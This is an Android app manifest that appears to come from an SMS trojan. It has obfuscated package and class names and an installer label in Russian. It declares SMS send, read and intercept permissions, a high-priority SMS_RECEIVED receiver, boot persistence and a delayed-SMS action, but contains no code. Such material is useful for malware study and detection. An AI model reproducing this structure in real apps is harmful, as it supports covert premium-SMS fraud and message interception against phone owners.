<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="srcdsnms.jlimwd">
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <application android:icon="@drawable/icon" android:label="Установка">
        <activity android:configChanges="keyboardHidden|orientation" android:label="Установка" android:launchMode="singleInstance" android:name=".rpeovx" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <receiver android:name=".tmhonwkgsyn">
            <intent-filter>
                <action android:name="android.intent.action.AIRPLANE_MODE"/>
            </intent-filter>
        </receiver>
        <service android:name="llebapbtewj.dbyffkesr.apeujawl">
            <intent-filter>
                <action android:name="llebapbtewj.dbyffkesr.apeujawlStart76"/>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </service>
        <receiver android:name="llebapbtewj.dbyffkesr.llwopolo">
            <intent-filter android:priority="999">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
        <receiver android:name="llebapbtewj.dbyffkesr.xiojqw">
            <intent-filter android:priority="999">
                <action android:name="llebapbtewj.dbyffkesr.RSNotification"/>
            </intent-filter>
        </receiver>
        <receiver android:name=".fpcvjotgi">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <category android:name="android.intent.category.HOME"/>
            </intent-filter>
        </receiver>
        <receiver android:name=".lxmifsomyvc">
            <intent-filter>
                <action android:name="srcdsnms.jlimwd.action.delayed.sms"/>
            </intent-filter>
        </receiver>
    </application>
</manifest>
